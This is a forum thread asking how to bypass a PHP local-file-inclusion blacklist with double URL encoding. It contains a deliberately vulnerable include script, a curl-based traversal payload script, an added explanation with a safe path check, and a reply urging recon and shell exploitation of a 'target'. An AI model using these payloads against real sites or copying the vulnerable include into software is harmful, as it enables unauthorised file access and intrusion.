Bypass LFI filter with double encoding
#1
Hi guys,

I'm trying to bypass an LFI filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't; it will remove everything except the file name.

../include.php: the file I want to include
PHP Code:
<?php
echo"hi";
?>

test.php: lfi filter that I try to bypass
PHP Code:
<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
// Blacklist filter: strip traversal sequences, plain and URL-encoded
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
// Include whatever is left after filtering
include($_GET['sFile']);
?>

exploit.php: the script that sends the payload
PHP Code:
<?php
$ch = curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($ch, CURLOPT_URL, "http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
// Return the response body instead of printing it directly
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sOutput = curl_exec($ch);
curl_close($ch);
echo $sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!
Reply
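
Why the request from exploit.php ends up as just the file name, traced through the filter from test.php, next to a path check that does not depend on a string blacklist. This is an added example, not part of the original posts; `filter_from_post`, `safe_include_path` and the temporary directory layout are hypothetical names constructed for the demonstration.

```php
<?php
// Added example. Function names and the directory layout are assumptions.

// The blacklist from test.php, unchanged, wrapped in a function.
function filter_from_post(string $s): string {
    $s = str_replace("../", "", strtolower($s));
    $s = str_replace("./", "", $s);
    $s = str_replace("%2e%2e%2f", "", $s);
    return str_replace("%2e%2f", "", $s);
}

// Resolve $name inside $baseDir; return null unless the canonical path
// is an existing file located under the canonical base directory.
function safe_include_path(string $baseDir, string $name): ?string {
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// PHP URL-decodes the query string once when it fills $_GET, so the
// value sent by exploit.php reaches the filter with one layer removed.
$onTheWire = "%252E%252E%252Finclude.php";
$inGet     = urldecode($onTheWire);     // what $_GET['sFile'] holds
$filtered  = filter_from_post($inGet);  // what include() is handed
echo "wire:     $onTheWire\n_GET:     $inGet\nfiltered: $filtered\n";
// include() does no URL decoding of its own, so a value that is still
// percent-encoded is only ever looked up as a literal file name.

// Constructed layout: <root>/include.php and <root>/tst/page.php
$root = sys_get_temp_dir() . "/lfitest_" . getmypid();
mkdir("$root/tst", 0700, true);
file_put_contents("$root/include.php", "<?php echo 'hi';");
file_put_contents("$root/tst/page.php", "<?php echo 'page';");

var_dump(safe_include_path("$root/tst", "page.php"));       // file inside the base
var_dump(safe_include_path("$root/tst", "../include.php")); // resolves outside the base
var_dump(safe_include_path("$root/tst", $inGet));           // the decoded request value

// Remove the constructed files again.
array_map('unlink', ["$root/include.php", "$root/tst/page.php"]);
rmdir("$root/tst");
rmdir($root);
```

Mapping a fixed set of permitted page names to fixed paths is stricter still, because the request value then never becomes part of a path.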
#2
(04-03-2017, 07:25 PM)peanutbutter Wrote: -snip-
Questions...
Are you attempting LFI to get some LFI exploits in your exp, or from not being able to identify more vulns off the target? LFI points to bigger flaws that are lying around: possible shell injections, remote cmd executions, etc. SQLi isn't the easiest to go for imo, as many high end sites have dropped $ on detection of many attacks etc. I only run into blind/time SQLi these days.

Have you done proper recon on your target?
What was your recon approach?
Recon is key to much of exploitation. It minimizes time used in acquiring correct exploitation methods. Scanners are OK, but you're better off using Burp Pro or some good manual techniques AFTER you have identified key details on the target such as OS, server, DB, etc.